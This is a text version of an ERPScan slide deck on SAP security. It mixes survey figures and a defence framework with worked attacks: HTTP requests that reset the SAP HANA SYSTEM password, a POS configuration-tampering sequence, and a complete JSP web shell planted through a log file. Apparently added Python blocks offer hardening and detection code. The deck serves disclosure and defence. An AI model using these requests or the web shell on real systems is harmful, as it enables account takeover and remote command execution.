SAP Cybersecurity 2018

Post on 06-Jun-2020

Page 1: SAP Cybersecurity 2018 - ERPScan · Approach to SAP security should change too. 1. World has changed • increased connectivity • boundless companies. 2. SAP has changed • cloud

SAP Cybersecurity 2018

Page 2

Page 3

Cyber attack kill chain

THE CHALLENGES WE FACE

Page 4

• Network security
• Web Application security
• Endpoint security
• Identity and access governance
• Threat Detection and Incident response
• Business application security

Just detecting/preventing initial intrusion

That's where a real attack happens

THE CISO RESPONSIBILITIES

Page 5

Approach to SAP security should change too

1. World has changed
• increased connectivity
• boundless companies

2. SAP has changed
• cloud and mobile access from anywhere
• global platform rather than legacy tool

3. Attackers have changed
• hackers are moving up the application stack
• every year we see major incidents with SAP systems

Source: ERP Cybersecurity Survey 2017

WHY

Page 6

The story of a small SAP vulnerability

Source: Owner of USIS files for bankruptcy. The Herald

Source: USIS cuts more than 2,500 jobs after losing contracts in wake of cyberattack. The Washington Post

USIS DATA BREACH

Page 7

ERP SECURITY

Q: What are the most critical business applications?

Business Intelligence (BI/BW) 36% | Supply Chain Management 32% | Product Lifecycle Management (PLM) 30% | Enterprise Asset Management (EAM) 27% | Supplier Relationship Management (SRM) 18% | Manufacturing Execution System (MES) 18%

Q: What kind of Business applications are used in your company?

Source: ERP Cybersecurity Survey 2017

Page 8

Source: Top New and Cool Technologies and Representative Vendors in Security, 2017. Gartner Risk Management Summit 2017 by Neil MacDonald

• Breach/Attack simulation
• Digital supply chain, risk assessment services
• Encryption by default, encryption everywhere
• Anti-fraud/bot protection platforms (UI protection)
• ERP-specific security/business-critical application security
• Data flow discovery, monitoring and analytics
• Bug bounty programs, crowdsourced and pen testing aaS
• Cloud firewalls and UTMs for branch office and SOHO
• ERP + EDR merger = advanced endpoint protection
• IoT/OT discovery, visibility, monitoring and deception
• SecOps chat

RADAR SCREEN – WHAT’S NEXT ON THE HORIZON?

Page 9

HOW IMPORTANT

Cyberattacks on ERP

Source: ERP Cybersecurity Survey 2017

Q: How will the number of cyberattacks against ERP Systems change within the next 2-3 years?

Page 10

SAP SECURITY

Why hack SAP?

• Espionage: to steal financial or HR data, supplier and customer lists, or disclose corporate secrets.

• Sabotage: to cause denial of service, counterfeit financial records and accounting data, or access the technology network (SCADA).

• Fraud: to carry out false transactions or modify master data.

Page 11

SAP ATTACK

How much does it cost?

Source: ERP Cybersecurity Survey 2017

Page 12

SAP SECURITY

How many vulnerabilities were found?

• 4000+ in all SAP products

• 2800+ in SAP NetWeaver ABAP based systems

• 1500+ in basic components which are the same in every system

• 400+ in ECC modules

More details here: https://goo.gl/Hr144b

Page 13

Q: Which of the following incidents related to SAP Security have you heard about most?

WHY DO ORGANIZATIONS LACK ERP SECURITY?

Source: ERP Cybersecurity Survey 2017

Page 14

Q: Who will be responsible if your ERP System is breached?

Q: Who is the person most accountable if your organization has a SAP breach?

Source: Uncovering the Risks of SAP Cyber Breaches. Ponemon Institute

Source: ERP Cybersecurity Survey 2017

RESPONSIBILITY

Page 15

Vulnerabilities: 3 latest examples

Page 16

Vulnerability 1: SAP HANA

Page 17

User-Self-Service

• Available since SPS09
• Deactivated by default
• Speeds up the following processes:
  o Forgot your password?
  o Request account
• Administrators must approve the accounts to activate them

USS

Page 18

```http
POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1
Host: <host>:<port>
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 137
DNT: 1
Connection: close

{"action":"createNewUser","username":"<username>","email":"<email>","x-sap-origin-location":""}
```

Create new user attempt

• The user self-service tools of SAP HANA contain vulnerabilities. An unauthenticated user might be able to impersonate other users, including administrative accounts.

• An attacker needs a security token to reproduce this vulnerability. The attacker must send a request to create a user, and the server will send the security token via e-mail.

USS

Page 19

• After the attacker receives the security token, he or she can change the password of any user with the following request

```http
POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1
Host: <host>:<port>
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: <length>
DNT: 1
Connection: close

{"pwd":"<pass>","confirmPwd":"<pass>","securitytoken":"<token>","securityQues":"1","securityAns":"{\"username\":\"SYSTEM\",\"time\":\"2020-01-10T22:10:06,024Z\"}|","action":"savePassword"}
```

• Changing any user's password is possible with a combination of the two vulnerabilities
• The attacker can inject additional variables into the JSON request; the JSON parser will parse them and save them into the USS security storage
• Those additional variables are then taken from the USS security storage and injected into the SQL request without any checks
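The two USS bugs combine because fields the server never expected are parsed, persisted and then reach SQL unchecked. As an added example (not SAP's xsjs code and not ERPScan's), the Python below shows the shape of a hardened savePassword handler: a key allowlist mirroring the request on this slide, the target user taken only from the server-side token lookup, parameterized SQL and a single-use token. The storage table, sample rows, hashing and request bodies are constructed assumptions.

```python
import hashlib
import json
import sqlite3

# Keys the USS "savePassword" action legitimately carries (taken from the request shown above).
ALLOWED_KEYS = {"action", "pwd", "confirmPwd", "securitytoken", "securityQues", "securityAns"}


def open_storage():
    """Constructed stand-in for the USS security storage: an in-memory SQLite table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE uss_storage (username TEXT PRIMARY KEY, securitytoken TEXT, pwd_hash TEXT)"
    )
    # Sample rows (constructed): ALICE has a pending reset token, SYSTEM has none.
    conn.execute("INSERT INTO uss_storage VALUES (?, ?, ?)", ("ALICE", "tok-alice-123", None))
    conn.execute("INSERT INTO uss_storage VALUES (?, ?, ?)", ("SYSTEM", None, "unchanged"))
    return conn


def unexpected_keys(body):
    """Keys outside the allowlist. The slide's bug is that such keys were parsed, stored and later
    interpolated into SQL; the fix is to reject the request before anything is persisted."""
    if not isinstance(body, dict):
        raise ValueError("JSON body must be an object")
    return sorted(set(body) - ALLOWED_KEYS)


def save_password_hardened(conn, raw_body):
    """Hardened savePassword handler: strict key allowlist, the target user derived only from the
    server-side token lookup, parameterized SQL, single-use token. Returns the affected username."""
    body = json.loads(raw_body)
    extra = unexpected_keys(body)
    if extra:
        raise ValueError(f"rejected unexpected parameters: {extra}")
    missing = sorted(ALLOWED_KEYS - set(body))
    if missing:
        raise ValueError(f"missing parameters: {missing}")
    if body["action"] != "savePassword":
        raise ValueError("wrong action for this handler")
    pwd = body["pwd"]
    if not isinstance(pwd, str) or pwd != body["confirmPwd"] or len(pwd) < 8:
        raise ValueError("password missing, mismatched or too short")
    # Nothing in the body may name the user; the token alone decides whose password is reset.
    row = conn.execute(
        "SELECT username FROM uss_storage WHERE securitytoken = ?", (body["securitytoken"],)
    ).fetchone()
    if row is None:
        raise PermissionError("unknown, already used or expired token")
    username = row[0]
    # Placeholder hashing for the demo; a real deployment defers to the platform's password store.
    pwd_hash = hashlib.sha256(pwd.encode()).hexdigest()
    conn.execute(
        "UPDATE uss_storage SET pwd_hash = ?, securitytoken = NULL WHERE username = ?",
        (pwd_hash, username),
    )
    conn.commit()
    return username


def outcome(conn, raw_body):
    """Helper for tests and demos: ('ok', username) or ('rejected', exception class name)."""
    try:
        return ("ok", save_password_hardened(conn, raw_body))
    except (ValueError, PermissionError) as exc:
        return ("rejected", type(exc).__name__)


def password_hash_of(conn, username):
    return conn.execute(
        "SELECT pwd_hash FROM uss_storage WHERE username = ?", (username,)
    ).fetchone()[0]


# Constructed request bodies shaped like the slide's savePassword request.
LEGIT_REQUEST = json.dumps({
    "pwd": "N3w-Passw0rd!", "confirmPwd": "N3w-Passw0rd!",
    "securitytoken": "tok-alice-123", "securityQues": "1", "securityAns": "pet name",
    "action": "savePassword",
})
# The same request with one extra key smuggled in, the pattern the slide describes.
INJECTED_REQUEST = json.dumps({**json.loads(LEGIT_REQUEST), "username": "SYSTEM"})

if __name__ == "__main__":
    conn = open_storage()
    print(outcome(conn, INJECTED_REQUEST))   # ('rejected', 'ValueError')
    print(outcome(conn, LEGIT_REQUEST))      # ('ok', 'ALICE')
    print(outcome(conn, LEGIT_REQUEST))      # ('rejected', 'PermissionError'): token already consumed
```

json.loads keeps the last value for a duplicated key, so the allowlist must be applied to the parsed object rather than to the raw text; clearing the token on success means a replay of the same request is refused.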

Source code

USS

Page 20

Vulnerability 2: How to buy a MacBook for $1

Pages 21-25: diagram of the SAP POS landscape (Xpress Server and POS clients), repeated across the build-up slides

Page 26

1. The Store Configurator creates config files, and Xpress Server applies them if it finds a "newparm.trg" file in a special directory.

2. We can write any data we want into any file on Xpress Server using port 2200.

3. POS Clients (Terminals) update their parameters after opening.

4. We can close and open POS Terminals using telnet on port 2202.

4 FACTS ABOUT SAP POS CAN HELP US MAKE A TRICK
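The four facts above describe one abuse path: configuration files and the newparm.trg trigger written over port 2200, then a terminal restart over port 2202. As an added detection example (not ERPScan's or SAP's code), the Python below correlates those events over a constructed, hypothetical log format. The field layout, host addresses and file paths are assumptions, and the real Xpress Server does not log in this form; the point is the correlation logic a monitoring rule needs.

```python
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

TRIGGER_FILE = "newparm.trg"     # trigger file name from the slide
CONFIG_WRITE_PORT = 2200         # file-write service from the slide
TERMINAL_CONTROL_PORT = 2202     # telnet terminal open/close service from the slide

# Constructed line format (hypothetical, not the real Xpress Server log layout):
#   <iso-timestamp> src=<ip> port=<port> op=<operation> [path=<file>]
EVENT_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) port=(?P<port>\d+) op=(?P<op>\w+)(?: path=(?P<path>.+))?$"
)


def parse_event(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    match = EVENT_RE.match(line.strip())
    if not match:
        return None
    return {
        "ts": datetime.fromisoformat(match["ts"]),
        "src": match["src"],
        "port": int(match["port"]),
        "op": match["op"],
        "path": match["path"],
    }


def is_trigger(event):
    return bool(event["path"]) and PureWindowsPath(event["path"]).name.lower() == TRIGGER_FILE


def detect_pos_config_abuse(lines, allowed_sources, window=timedelta(minutes=10)):
    """Return (rule, source, path) alerts.
    untrusted_config_write  any port-2200 write from a host other than the store configurator
    trigger_from_untrusted  newparm.trg dropped by such a host
    push_then_restart       a trigger write followed within `window` by terminal close AND open on
                            port 2202 from the same source (the full sequence on the next slides)"""
    events = [e for e in (parse_event(line) for line in lines) if e]
    alerts = []
    for event in events:
        if event["port"] == CONFIG_WRITE_PORT and event["src"] not in allowed_sources:
            alerts.append(("untrusted_config_write", event["src"], event["path"]))
            if is_trigger(event):
                alerts.append(("trigger_from_untrusted", event["src"], event["path"]))
    for trigger in (e for e in events if is_trigger(e)):
        control_ops = {
            e["op"] for e in events
            if e["port"] == TERMINAL_CONTROL_PORT and e["src"] == trigger["src"]
            and trigger["ts"] <= e["ts"] <= trigger["ts"] + window
        }
        if {"TERMINAL_CLOSE", "TERMINAL_OPEN"} <= control_ops:
            alerts.append(("push_then_restart", trigger["src"], trigger["path"]))
    return alerts


# Constructed sample: the store configurator (10.0.0.2) does a normal push; an unknown host
# (10.0.0.99) pushes files, drops the trigger and bounces the terminal.
SAMPLE_LOG = """\
2018-03-01T09:00:00 src=10.0.0.2 port=2200 op=FILE_WRITE path=C:\\xpress\\param\\store.cfg
2018-03-01T09:00:01 src=10.0.0.2 port=2200 op=FILE_WRITE path=C:\\xpress\\param\\newparm.trg
2018-03-01T11:30:00 src=10.0.0.99 port=2200 op=FILE_WRITE path=C:\\xpress\\param\\prices.cfg
2018-03-01T11:30:02 src=10.0.0.99 port=2200 op=FILE_WRITE path=C:\\xpress\\param\\newparm.trg
2018-03-01T11:31:00 src=10.0.0.99 port=2202 op=TERMINAL_CLOSE
2018-03-01T11:31:30 src=10.0.0.99 port=2202 op=TERMINAL_OPEN
""".splitlines()

STORE_CONFIGURATOR = {"10.0.0.2"}

if __name__ == "__main__":
    for alert in detect_pos_config_abuse(SAMPLE_LOG, STORE_CONFIGURATOR):
        print(*alert)
```

The first two rules fire on a single event and are the cheap ones to deploy: any write on port 2200 from a host that is not the store configurator is already a finding. The third rule is the one that matches the slide's full sequence and is worth a higher severity, since it indicates the pushed configuration was actually picked up by a terminal.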

Pages 27-37: attack sequence diagram (Attacker, Xpress Server with PORT 2200 and PORT 2202, POS Client, Database), built up one step per slide:

1 Evil Configuration files
2 Trigger file "newparm.trg"
3 Apply new settings
4 Write some of them in database
5 Close Terminal
6 Close Terminal
7 Open Terminal
8 Open Terminal
9 Get evil Configuration files

Page 38

Vulnerability 3: How to steal all CRM accounts

Page 39

One of the thousands

SAP REDWOOD APP

Page 40

Source code

SAP REDWOOD APP

Page 41

Directory traversal

REDWOOD APP

Page 42

CRM ADMIN CONSOLE

Page 43

CRM LOGGING CONFIGURATION

Page 44

Typical .jsp shell

```jsp
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    out.println("<PRE>");
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
    out.println("</PRE>");
}
%>
```

EXAMPLE OF EVIL CODE

Page 45

By sending an HTTP request

WRITING EVIL CODE

Page 46

THE EVIL CODE IN THE LOG FILE

Page 47

With the help of the evil code

COMMAND EXECUTION
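The chain on pages 41-47 relies on two things: a traversal that lets the log destination leave the log directory, and request data that is written to the log verbatim. As an added example (not the page's, SAP's or the Redwood application's code), the Python below shows the defensive check for the first and a scan for the second. The log directory, the allowed extensions and the access-log lines are constructed assumptions, and the path logic is written for POSIX paths.

```python
import posixpath
import re
from urllib.parse import unquote

LOG_DIR = "/srv/crm/log"             # constructed location of the CRM log directory
ALLOWED_SUFFIXES = (".log", ".txt")  # assumption: log output may only use these extensions

# Fragments that have no business in an access log; "<%@" and "<%=" are listed before "<%" so the
# most specific marker is reported.
JSP_MARKERS = re.compile(r"<%@|<%=|<%|%>|Runtime\.getRuntime|request\.getParameter")


def resolve_log_path(base_dir, requested_name):
    """Resolve an administrator-supplied log file name inside base_dir (POSIX paths).
    Rejects embedded NUL bytes, absolute paths, traversal out of base_dir and executable
    extensions, so a logging-configuration change cannot turn a log into a .jsp in the web root."""
    if "\x00" in requested_name:
        raise ValueError("embedded NUL byte")
    if posixpath.isabs(requested_name):
        raise ValueError("absolute paths are not allowed")
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, requested_name))
    if not candidate.startswith(base + "/"):
        raise ValueError("path must name a file inside the log directory")
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        raise ValueError("log files must end in one of %s" % (ALLOWED_SUFFIXES,))
    return candidate


def is_rejected(base_dir, requested_name):
    """Helper for tests: True when resolve_log_path refuses the name."""
    try:
        resolve_log_path(base_dir, requested_name)
        return False
    except ValueError:
        return True


def scan_log_for_jsp(lines):
    """Return (line_number, marker) for log lines that contain JSP fragments after URL-decoding.
    A hit means attacker-controlled request data reached the log verbatim, the precondition for
    the log-file-as-webshell chain shown on these slides."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = JSP_MARKERS.search(unquote(line))
        if match:
            hits.append((number, match.group(0)))
    return hits


# Constructed access-log lines: one benign request, one with JSP code in a parameter,
# and one with the same kind of code URL-encoded.
SAMPLE_ACCESS_LOG = [
    '10.0.0.7 - - [01/Mar/2018:10:00:00] "GET /crm/admin/console HTTP/1.1" 200 512',
    '10.0.0.99 - - [01/Mar/2018:10:05:12] "GET /crm/?q=<%@ page import=\\"java.io.*\\"%> HTTP/1.1" 200 88',
    '10.0.0.99 - - [01/Mar/2018:10:05:13] "GET /crm/?q=%3C%25 Runtime.getRuntime() %25%3E HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    print(resolve_log_path(LOG_DIR, "crm.log"))                   # /srv/crm/log/crm.log
    print(is_rejected(LOG_DIR, "../../webapps/ROOT/shell.jsp"))   # True
    print(scan_log_for_jsp(SAMPLE_ACCESS_LOG))                    # [(2, '<%@'), (3, '<%')]
```

The NUL-byte check matters because a name such as `shell.jsp\x00.log` passes a naive extension test while a C-based file API truncates it at the NUL. The scanner decodes percent-encoding first so that an encoded `<%` is caught as well as a literal one.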

Page 48

Statistics: The most vulnerable industries

Page 49

MOST VULNERABLE INDUSTRIES

(chart values: 46%, 30%, 15%)

• An average company using SAP has 35% of its security parameters configured unsafely

• Manufacturing companies fail in Patch Management: more than 40% do not implement SAP Security Notes

• The IT industry fails in encryption: 90% of companies do not implement SSL/SNC for RFC connections

Page 50

MOST VULNERABLE COMPONENTS

Message Server
• Gateway (35% of companies)
• MMC (45% of companies)
• Host Control (5% of companies)
• Enqueue (13% of companies)

>70% OF COMPANIES HAVE CRITICAL VULNS

Page 51

USER SECURITY

Profiles:
• ~55 users have the SAP_ALL profile assigned
• ~20 RFCs use default users (SAPCPIC, TMSADM, EARLYWATCH, …)

Passwords:
• 10% of passwords are vulnerable to dictionary attacks
• In most systems the default length is 6 chars
• 91% of Oil & Gas companies didn't configure complexity requirements at all
• 63% of all companies allow never-expiring passwords

% of systems with default passwords: SAP* 2%, DDIC 23%, TMSADM 32%, SAPCPIC 54%

99%: in audits we've found at least one SAP system with default users/passwords!

Page 52

ENCRYPTION

HTTPS: 83%

SNC: 37%

P4SEC: NEVER!

90% of IT companies don't use encryption to protect RFC at all

Only in 3% of all cases does the SAP system validate clients' certificates

Page 53

LOGGING

SAP ABAP Security Audit Log
User actions: logons, access to reports and tables, executions of transactions
Enabled in 57% of systems

SAP ABAP HTTP logs (ICM/MS/WebDispatcher)
Attacks: SQL Injection, XSS, XXE, RCE, DoS, Directory Traversal…
ICM: enabled in 38% of systems
MS: enabled in 27% of systems
WD: enabled in 23% of systems

Gateway
Network actions, RFC actions, dynamic parameter changes
Enabled in 15% of systems

Maximum audit log file size is less than 200M

Enable all logs, set a big enough file size (~2 Gb), archive and rotate logs

Page 54

RECOMMENDATIONS

Oil & Gas, Energy, Manufacturing industries adapt slowly:
• Delayed patching
• Lack of staff trained in security
• Delusion that SCADA systems are isolated from ERP systems

All:
• Lack of control
• Default users/passwords
• Disabled logs

IT & Finance industry:
• No encryption
• Custom development
• Ever-changing landscape

Pentest them to convince the management to implement security controls

Monitor user actions and systems' behaviour

Scan systems' security configurations

Page 55

Defense: Business Case for SAP Cybersecurity Framework

Page 56

CURRENT STATE

CISO / CIO

ENTERPRISE SECURITY: VULNERABILITY MANAGEMENT
SAP BASIS: PATCHING SAP SYSTEMS
SAP SECURITY: SEGREGATION OF DUTIES
IT OPERATIONS: MONITORING SAP SYSTEMS

LACK OF EFFECTIVE OVERSIGHT
LACK OF VISIBILITY
COMPLEXITY
POOR INTEGRATION
SLIPPED THROUGH THE CRACKS

Page 57

FUTURE STATE

CISO / CIO / CRO

ENTERPRISE SECURITY: Vulnerability Management + Asset Management + Risk Management + Secure Development
SAP BASIS: Patching SAP systems + Incident Response + Mitigation + Improvements
SAP SECURITY: Segregation Of Duties + Data Security + Secure Architecture + Awareness and Training
IT OPERATIONS: Monitoring SAP systems + Threat Detection + User Behavior + Data Leakage

Page 58

EAS-SEC

Gartner: Designing an Adaptive Security Architecture for Protection From Advanced Attacks

Source: https://www.gartner.com/doc/2665515/

HISTORY

Page 59

Page 60

Category: PREDICT

Process: Secure Development

Purpose: To ensure security during SAP systems development and acquisition.

Outcomes:
• Security Requirements
• Development Standards and Processes
• Security Plans

Implementation steps:
1. Develop basic security requirements for the configuration of servers, networks, SAP applications and client stations
2. Create secure development standards and processes
3. Automate secure development processes

SAP CYBERSECURITY FRAMEWORK

Page 61

IMPLEMENTATION TIERS

Tier 1: 50%, 3-6 months
Tier 2: 80%, 6-12 months
Tier 3: 99%, 12 months

Page 62

SAP Cybersecurity Framework

Security Program

Security Policies

Security Plans

Process Descriptions

Technical Solutions

BENEFITS

Page 63

PREDICT: Understand SAP environment

Page 64

PREDICT

Process: Purpose

Asset Management: To communicate information about SAP assets, security category of the assets, rules of acceptable use and protection requirements

Business Environment: To provide SAP business context, ensure cybersecurity continuity of SAP systems and address cybersecurity in supplier relationships

Governance: To develop cybersecurity policies, roles, responsibilities and procedures to ensure SAP cybersecurity is understood and integrated into organization operational and management processes

Vulnerability Management: To provide cybersecurity assurance in SAP systems by assessing vulnerabilities and reducing attack vectors

Risk Management: To make decisions on addressing possible adverse impacts from the operation and use of SAP systems

Secure Development: To ensure security during SAP systems development and acquisition

Page 65

VULNERABILITY MANAGEMENT

Purpose: To provide cybersecurity assurance in SAP systems by assessing vulnerabilities and reducing attack vectors

Implementation:
1. Regularly perform SAP security audits and penetration tests
2. Repeatedly scan SAP systems for vulnerabilities, recommend and track remediations
3. Monitor vulnerabilities, remediations and threats online from public and private sources and threat intelligence feeds

Outcomes:
• Scan Plans
• Scan Profiles
• Remediation Plans

Page 66

PREVENT: Reduce the surface area of attack

Page 67

PREVENT

Process: Purpose

Access Control: To limit rights of authorized users and prevent unauthorized use of an SAP system

Awareness and Training: To provide personnel and contractors with cybersecurity awareness education and training to perform their duties and responsibilities

Data Security: To enforce requirements for confidentiality, integrity and availability of information in SAP systems on the data layer

Secure Architecture: To ensure security of all SAP solutions throughout all SAP components, connections, infrastructure and security controls

Page 68

ACCESS CONTROL

Purpose: To limit rights of authorized users and prevent unauthorized use of an SAP system

Implementation:
1. Secure the network, servers and endpoint devices
2. Implement role-based access control to SAP functionality
3. Enforce Segregation of Duties controls according to business process rules

Outcomes:
• Access Rules
• Access Mechanisms
• Access Control Reports

Page 69

ACCESS CONTROL. HOW TO CREATE A USER?

Ways to create a user in an SAP system:
1. Transaction SU01
2. Database table USR02
3. RFC function BAPI_USER_CREATE
4. Web exploit using the InvokerServlet feature and the CTC servlet

Number of objects:
1. More than 300 000 transactions
2. More than 500 000 tables
3. More than 40 000 RFC functions
4. 500 known web exploits

Page 70

DETECT: Monitor threats

Page 71

DETECT

Process: Purpose

Event Management: To collect information on SAP security related events

Threat Detection: To detect attacks and possible threats to SAP systems

User Behavior: To detect deviations of user behavior from typical in SAP systems

Data Leakage: To detect data leakages in SAP systems

Page 72

EVENT MANAGEMENT. EVENT SOURCES

o SAP ABAP Security log
o SAP ABAP Audit log
o SAP ABAP HTTP log
o SAP ABAP ICM Security log
o SAP ABAP RFC log
o SAP J2EE HTTP log
o SAP HANA Security log
o SAP HANA log

More than 30 logs

Log Management Solutions

Page 73

THREAT DETECTION

Purpose: To detect attacks and possible threats to SAP systems

Implementation:
1. Configure IDS/IPS systems to detect SAP attack signatures
2. Manually review SAP security events
3. Monitor potential attacks, security event combinations and anomalies

Outcomes:
• Threat Catalogue
• Threat Data Sources
• Threat Detection Rules

Page 74

RESPOND: Investigate, take actions and improve

Page 75

RESPOND

Process: Purpose

Incident Response: To systematically respond to violation or threat of violation of SAP security policies and practices

Clear Communications: To establish structure for SAP security responsibility in a business and provide means for clear communications between its members

Continuous Analysis: To continuously monitor effectiveness of SAP security processes and provide insights into the state of SAP security

Mitigation: To design and model changes to security of SAP systems

Improvements: To learn from external events and internal assessments of SAP security controls

Page 76

MITIGATION. VIRTUAL PATCHING

Page 77

Page 78

THANK YOU

USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301. Phone 650.798.5255

EU: Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam. Phone +31 20 8932892

EU: Štětkova 1638/18, Prague 4 - Nusle, 140 00, Czech Republic

Read our blog: erpscan.com/category/press-center/blog/

Join our webinars: erpscan.com/category/press-center/events/

Subscribe to our newsletters: eepurl.com/bef7h1

[email protected]

Alexander Polyakov, CTO, [email protected]